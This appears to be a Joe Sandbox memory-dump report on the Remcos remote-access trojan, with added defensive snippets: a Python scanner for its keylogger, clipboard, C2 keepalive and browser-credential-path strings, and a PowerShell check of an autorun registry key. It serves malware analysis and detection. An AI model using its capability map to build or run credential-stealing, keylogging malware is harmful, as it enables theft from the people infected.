                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]
                        • API String ID: 1881088180-3686566968
                        • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                        • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                        APIs
                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                        • GetLastError.KERNEL32 ref: 0044B804
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: PkGNG
                        • API String ID: 442123175-263838557
                        • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                        • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                        • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                        • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                        APIs
                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                        • GetLastError.KERNEL32 ref: 0044B716
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: PkGNG
                        • API String ID: 442123175-263838557
                        • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                        • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                        • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                        • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                        APIs
                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-1507639952
                        • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                        • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                        APIs
                        • Sleep.KERNEL32 ref: 00416640
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadFileSleep
                        • String ID: !D@
                        • API String ID: 1931167962-604454484
                        • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                        • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: alarm.wav$hYG
                        • API String ID: 1174141254-2782910960
                        • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                        • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                        APIs
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                        • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B0C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                        • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                        APIs
                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: String
                        • String ID: LCMapStringEx$PkGNG
                        • API String ID: 2568140703-1065776982
                        • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                        • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                        APIs
                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferHeaderPrepare
                        • String ID: XMG
                        • API String ID: 2315374483-813777761
                        • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                        • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                        APIs
                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocaleValid
                        • String ID: IsValidLocaleName$JD
                        • API String ID: 1901932003-2234456777
                        • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                        • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                        • API String ID: 1174141254-4188645398
                        • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                        • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                        • API String ID: 1174141254-2800177040
                        • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                        • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: AppData$\Opera Software\Opera Stable\
                        • API String ID: 1174141254-1629609700
                        • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                        • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040B64B
                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                        • String ID: [AltL]$[AltR]
                        • API String ID: 2738857842-2658077756
                        • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                        • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
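The string IDs in the records above are the runtime markers Remcos writes into its logs and the paths it probes: `[Text copied to clipboard]` / `[End of clipboard]` for the clipboard logger, `Offline Keylogger Started` / `Online Keylogger Stopped` and `[AltL]` / `[AltR]` for the keylogger, `KeepAlive | Enabled | Timeout: ` for the C2 heartbeat, and the Chrome, Edge and Opera profile directories for the credential stealer. Because they appear in a memory dump of the unpacked payload (source `00000011.00000002...sdmp`, base `00400000`), they are useful for hunting in process memory even when the on-disk dropper is packed. The scanner below is an added example for this page, not Remcos or Joe Sandbox code; it searches a dump for these markers in both UTF-16LE and ASCII (the assumption being that a binary calling `wsprintfW` and `PathFileExistsW` stores them wide, which the scan does not rely on) and runs against a small dump constructed inline rather than the real `.sdmp`.

```python
"""Hunt for the Remcos runtime strings listed in this report inside a process
memory dump, in UTF-16LE and ASCII, and group hits by the capability they mark.

Added example for this page, not Remcos or Joe Sandbox code. The marker strings
are taken from the String IDs above; the dump scanned below is constructed here
and is not the report's 00000011.00000002.2184795000 .sdmp file.
"""

# Marker strings grouped by the capability they belong to (from the records above).
MARKERS = {
    "clipboard-logger": ["[Text copied to clipboard]", "[End of clipboard]"],
    "keylogger": ["Offline Keylogger Started", "Online Keylogger Stopped",
                  "[AltL]", "[AltR]"],
    "c2-keepalive": ["KeepAlive | Enabled | Timeout: "],
    "browser-credential-paths": ["\\AppData\\Local\\Google\\Chrome\\",
                                 "\\AppData\\Local\\Microsoft\\Edge\\",
                                 "\\Opera Software\\Opera Stable\\"],
}

IMAGE_BASE = 0x400000   # "Offset: 00400000" in the Memory Dump Source lines above


def _needles(text):
    """Both encodings a Windows program is likely to keep a literal in."""
    return {"utf-16le": text.encode("utf-16-le"), "ascii": text.encode("ascii")}


def scan(blob, markers=MARKERS):
    """Return sorted (offset, family, marker, encoding) tuples for every hit."""
    hits = []
    for family, strings in markers.items():
        for s in strings:
            for enc, needle in _needles(s).items():
                start = 0
                while (i := blob.find(needle, start)) != -1:
                    hits.append((i, family, s, enc))
                    start = i + 1
    return sorted(hits)


def to_va(offset, base=IMAGE_BASE):
    """Dump offset -> virtual address, valid when the dump starts at the image base."""
    return base + offset


def classify(hits, min_families=2):
    """Call the dump Remcos-like when markers from several capabilities co-occur;
    a single family (e.g. only browser paths) is too weak on its own."""
    families = sorted({h[1] for h in hits})
    label = "remcos-like" if len(families) >= min_families else "inconclusive"
    return label, families


def build_sample_dump():
    """Constructed dump: wide strings with zero padding, plus one ASCII marker."""
    parts = [
        b"\x00" * 64,
        "[Text copied to clipboard]".encode("utf-16-le"), b"\x00" * 16,
        "KeepAlive | Enabled | Timeout: ".encode("utf-16-le"), b"\x00" * 16,
        "\\AppData\\Local\\Google\\Chrome\\".encode("utf-16-le"), b"\x00" * 16,
        b"[AltL]", b"\x00" * 32,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    dump = build_sample_dump()
    found = scan(dump)
    for off, family, marker, enc in found:
        print(f"{to_va(off):08X} {family:26} {enc:8} {marker!r}")
    print(classify(found))
```

On a real dump, feed `scan()` the bytes of the `.sdmp` (or a `procdump`/`MemProcFS` export) and compare the virtual addresses with the `xrefs` Joe Sandbox prints, for example `KeepAlive | Enabled | Timeout: ` at `0040501F` above; requiring at least two marker families before alerting keeps benign software that merely references browser profile paths out of the results.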
                        APIs
                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: uD
                        • API String ID: 0-2547262877
                        • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                        • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystem
                        • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                        • API String ID: 2086374402-949981407
                        • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                        • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: !D@$open
                        • API String ID: 587946157-1586967515
                        • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                        • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                        APIs
                        • ___initconout.LIBCMT ref: 0045555B
                          • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                        • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleCreateFileWrite___initconout
                        • String ID: PkGNG
                        • API String ID: 3087715906-263838557
                        • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                        • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                        • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                        • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                        • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                        APIs
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • __Init_thread_footer.LIBCMT ref: 00410F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: ,kG$0kG
                        • API String ID: 1881088180-2015055088
                        • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                        • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                        • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 2654517830-1051519024
                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
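The record above shows the sample opening HKEY_LOCAL_MACHINE (hKey 0x80000002) \Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run with samDesired 0x00000002 (KEY_SET_VALUE) and then calling RegDeleteValueW, i.e. it removes a value from a policy-controlled autorun key that is processed like the ordinary Run keys but is reviewed far less often. The following PowerShell snippet is an added triage check, not part of the Joe Sandbox report or of the sample; it lists every value under that key. The HKLM path is what the report records; including the HKCU counterpart is an assumption added here for completeness.

```powershell
# Added example (not from the report): list autorun values under the
# Policies\Explorer\Run key the sample touches. HKLM is what the report shows;
# HKCU is an assumed extension so both hives are covered in one pass.
$paths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
)

foreach ($p in $paths) {
    if (-not (Test-Path -LiteralPath $p)) {
        Write-Output "$p : key absent"
        continue
    }
    $item  = Get-Item -LiteralPath $p
    $names = $item.GetValueNames()
    if ($names.Count -eq 0) {
        Write-Output "$p : key present, no values"
        continue
    }
    foreach ($n in $names) {
        # Read raw data without expanding %VAR% so the stored string is shown as-is.
        $data = $item.GetValue($n, $null, 'DoNotExpandEnvironmentNames')
        [pscustomobject]@{
            Key  = $p
            Name = if ($n -eq '') { '(Default)' } else { $n }
            Kind = $item.GetValueKind($n)
            Data = $data
        }
    }
}
```

Run it from an elevated prompt on the analysis VM before and after execution of the sample; a value that appears and then disappears between the two runs matches the open-then-delete pattern in the record, whereas a value that persists points to a different persistence path than the one this function handles.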
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                        • GetLastError.KERNEL32 ref: 00440D35
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                        • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
